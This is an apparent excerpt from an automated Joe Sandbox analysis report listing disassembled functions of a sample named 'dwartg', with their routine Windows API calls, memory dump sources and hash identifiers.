                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID: pu
                                                                                              • API String ID: 2991157371-250260183
                                                                                              • Opcode ID: ba1571174276ec53c009dedb29d10cea0420908e205153492ba3cd797a8e64ac
                                                                                              • Instruction ID: cfb9399e4d8e20f99b5139816d8264b8a6e4398f5f53c066edaadf546eec4a38
                                                                                              • Opcode Fuzzy Hash: ba1571174276ec53c009dedb29d10cea0420908e205153492ba3cd797a8e64ac
                                                                                              • Instruction Fuzzy Hash: 40310B31A04209EFDB14DFA8D845BAD77F5EF41320F218499E9149B2A2EB7ADE40DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: 2s$PDu<s
                                                                                              • API String ID: 1269201914-970619881
                                                                                              • Opcode ID: 31c2ac2618cdd501737a70046d6b87e640ce86c0a122f6fa52110fc84f1a8931
                                                                                              • Instruction ID: 404acd75d1b5149ccec74ce83a993814fd043e799aaaf8cd7df92e79f0e8113f
                                                                                              • Opcode Fuzzy Hash: 31c2ac2618cdd501737a70046d6b87e640ce86c0a122f6fa52110fc84f1a8931
                                                                                              • Instruction Fuzzy Hash: 6FB012C1698140FD3104610C1C06E7F011DC0C1F15730503EF804C00C2E88C0D440531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: (s$PDu<s
                                                                                              • API String ID: 1269201914-480722381
                                                                                              • Opcode ID: b3b25e7a0d33dc90f3c9ccd5f0ae6a924871cc089e398d779239bd9a1f222228
                                                                                              • Instruction ID: 8c3f68ee1192d28e84e4889f7785a324503899e73897345fa36affa9fc99bde5
                                                                                              • Opcode Fuzzy Hash: b3b25e7a0d33dc90f3c9ccd5f0ae6a924871cc089e398d779239bd9a1f222228
                                                                                              • Instruction Fuzzy Hash: C0B012C1698180FC3104610C1D06D7F051DC0C1F15730903EF804C41C2E88C0D450531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00729F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0072D343,00000001,?,?,?,00000000,0073551D,?,?,?), ref: 00729F9E
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0073551D,?,?,?,?,?,00734FC7,?), ref: 00729FE5
                                                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0072D343,00000001,?,?), ref: 0072A011
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Handle
                                                                                              • String ID:
                                                                                              • API String ID: 4209713984-0
                                                                                              • Opcode ID: aca1382566d0989580b2cfa07089b79aff225f875697b4f0d68699021ae4e6a7
                                                                                              • Instruction ID: 46c150bdda7b7cf7929623cd94886d940c2c756e5fd408c3845fee3693d7e2ac
                                                                                              • Opcode Fuzzy Hash: aca1382566d0989580b2cfa07089b79aff225f875697b4f0d68699021ae4e6a7
                                                                                              • Instruction Fuzzy Hash: 5331F531204325AFDB24CF20E918BAEB7A5FF84711F04491DF945972D0D779AD48CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0072C27E: _wcslen.LIBCMT ref: 0072C284
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A2D9
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A30C
                                                                                              • GetLastError.KERNEL32(?,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A329
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2260680371-0
                                                                                              • Opcode ID: 1c27ad1e6ea425b159e45b4de31e82ce5d8476e14f0cc2eb1353eb6af16f310c
                                                                                              • Instruction ID: d988740ed4147f4d3f7a55bc1516873b143104bc78932567a80fe9c76939ddc8
                                                                                              • Opcode Fuzzy Hash: 1c27ad1e6ea425b159e45b4de31e82ce5d8476e14f0cc2eb1353eb6af16f310c
                                                                                              • Instruction Fuzzy Hash: 91019E21600370BBEF21EA756C09BEE2388AF0A781F044454F901E6092EB6CDA8186B6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0074B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0074B8B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID:
                                                                                              • API String ID: 1807457897-3916222277
                                                                                              • Opcode ID: 9e99bfa672472cea4c1ba4c67dc1032be76dc0acf5b5420b44fbf8b0f87598e1
                                                                                              • Instruction ID: 06c1d71436392f7e9da060732aff4b4c16c8b0011b2980c483bd48c4042029b9
                                                                                              • Opcode Fuzzy Hash: 9e99bfa672472cea4c1ba4c67dc1032be76dc0acf5b5420b44fbf8b0f87598e1
                                                                                              • Instruction Fuzzy Hash: 2441C6B050438CEADB218E688C84BF6BBADEB55304F1444EDE6DA86142D379EE45DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0074AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0074AFDD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              • API String ID: 2568140703-3893581201
                                                                                              • Opcode ID: 09417285b0b741213c895c428b368a16898a2cfc2847a0a6dc98a353a8ee612c
                                                                                              • Instruction ID: bb8831003323c6f2049a844128d3f3e30ee49e0ec248d146d55ca200afe2e3a7
                                                                                              • Opcode Fuzzy Hash: 09417285b0b741213c895c428b368a16898a2cfc2847a0a6dc98a353a8ee612c
                                                                                              • Instruction Fuzzy Hash: 8B011372544209BBCF069F90EC06DEE7F66EB08751F018154FE1826160CB7A9A31EB95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0074AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0074A56F), ref: 0074AF55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                              • API String ID: 2593887523-3084827643
                                                                                              • Opcode ID: 1e28edfeee873940bb71a00b3cf974a758802b1006370424ade05f511de9a33e
                                                                                              • Instruction ID: a50748f29676eec84dbd411a1d9afcea7893668f506824c6fec97f595b5aaa3c
                                                                                              • Opcode Fuzzy Hash: 1e28edfeee873940bb71a00b3cf974a758802b1006370424ade05f511de9a33e
                                                                                              • Instruction Fuzzy Hash: 3AF0B471685208FBCF065F60DC06CDDBF61EF04752B008054FD0856260DFB9AE14DBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0074ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
                                                                                              • Opcode ID: f44fe8f24e4a944cde1a02fa62c3e7a1b3e77b20200fa40d669f88a4e9fadf09
                                                                                              • Instruction ID: 64bd5ed12231200b87735bb597ace6458e2c88f2b98624fd3c04695598131e49
                                                                                              • Opcode Fuzzy Hash: f44fe8f24e4a944cde1a02fa62c3e7a1b3e77b20200fa40d669f88a4e9fadf09
                                                                                              • Instruction Fuzzy Hash: ABE05C70F80308B7C2059B24DC07DEEB754DB04723B000054FC0053250CFBC6E0086E9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 7b4425b3ef78096f697e10aea6d54999fc05efa2f580270712bd81530fdb5b3b
                                                                                              • Instruction ID: 3a86e36fe59961287415a49ab42a24efb5e8df2955aa2a751c40fde0f559d0e8
                                                                                              • Opcode Fuzzy Hash: 7b4425b3ef78096f697e10aea6d54999fc05efa2f580270712bd81530fdb5b3b
                                                                                              • Instruction Fuzzy Hash: 82B012D2698104EC3104624D1C0AD77010CC0C1F11730C03FFC05C01C2E88CAC080531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: c30dd849b9e4733be27c2ef68580431f5660ed35e0dd91de09fc1b88241d81aa
                                                                                              • Instruction ID: b566639204146a77b82584c7962a855c726fed6de3e7987366f1ff7bd788865d
                                                                                              • Opcode Fuzzy Hash: c30dd849b9e4733be27c2ef68580431f5660ed35e0dd91de09fc1b88241d81aa
                                                                                              • Instruction Fuzzy Hash: B0B012D669C208EC3104618D1C0AD77010CC0C0F11730403EFC05C00C2F88C6C040631
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 0e362b4ab50ad646d9bcc9e24b78a98c51f85def237ab55f16092dbea094ec32
                                                                                              • Instruction ID: cff15c2ba6a6bc965a8b33e3ba546e0daf4e2c93847c88e67098ee6824808acf
                                                                                              • Opcode Fuzzy Hash: 0e362b4ab50ad646d9bcc9e24b78a98c51f85def237ab55f16092dbea094ec32
                                                                                              • Instruction Fuzzy Hash: 83B012D6698204FC310421891C0AC77010CC0C1F11730843EFC01C04C2F88CAC040431
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: 7487020f1e36f48d9fec119daa61bfe49dc24f174e5b62f485fcc0ffadf2a909
                                                                                              • Instruction ID: 4115b9989d44e8f265b8b502e64be86146fbbf08ac8b0cc7365d9df35b8db461
                                                                                              • Opcode Fuzzy Hash: 7487020f1e36f48d9fec119daa61bfe49dc24f174e5b62f485fcc0ffadf2a909
                                                                                              • Instruction Fuzzy Hash: 13B012D26A9144EC310461891C0AD77014DC4C0F11B30403EFC06C00C2E88C6C040531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              • Opcode ID: aa0459f5ddb45448e2c818f609fbdec6c734b1ccbaa53b84fb8b65f20dead06d
                                                                                              • Instruction ID: 09d99f4ca92617fe5929ef9a833a62be0849bfd39806d0bf1ed7a8472bdb5b5f
                                                                                              • Opcode Fuzzy Hash: aa0459f5ddb45448e2c818f609fbdec6c734b1ccbaa53b84fb8b65f20dead06d
                                                                                              • Instruction Fuzzy Hash: 9BB012D2698104EC3104A1591C0AD77014CC0C1F11730803EFC05C00C2E88CAC040531
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
